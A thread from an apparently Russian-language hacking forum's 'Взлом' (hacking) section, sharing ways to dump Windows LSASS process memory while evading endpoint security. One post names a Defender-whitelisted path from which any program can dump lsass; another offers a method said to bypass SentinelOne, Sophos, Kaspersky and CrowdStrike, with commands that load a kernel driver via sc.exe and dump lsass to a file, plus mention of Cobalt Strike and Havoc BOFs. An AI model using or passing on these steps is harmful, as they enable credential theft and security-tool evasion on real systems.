Что нового?
Взлом
Уважаемые гости! При посещении нашего сайта просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.п., а также при обращении за помощью просим быть внимательными: на сайте есть как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант-сервиса. Спасибо, что посетили XakerPlus!

Dump LSASS bypasses defender


 ​
Defender whitelists the path, so any application running from c:\Windows\Temp\cr0czrap\Extract\TrolleyExpress.exe is allowed to dump lsass 
smile.png
 
 
Последнее редактирование:
Отдаю бесплатно метод дампа любого защищенного процесса, по крайней мере это было актуально год-полтора назад, Сентинел, Софос, Каспер, Крауд обходил без проблем не смотря на MiniDumpWriteDump, сейчас не знаю, давно не пользовались. (Убрано все лишнее из исходников) Так же где то был BOF под кобу и хавк. Если найду то скину сюда. При сильном желании адтоптировать в BOF из исходников не составит труда.
 
Запуск от админа:тыц
Код: 
sc.exe create навзание binPath= "путь к драйверу" type= kernel
sc.exe start название

dmp.exe lsass.exe C:\tmp.bin
 
 
Хорошее видео, теперь стало все намного яснее. Теперь буду знать как правильно настроить
 
Войдите или зарегистрируйтесь для ответа.


Сверху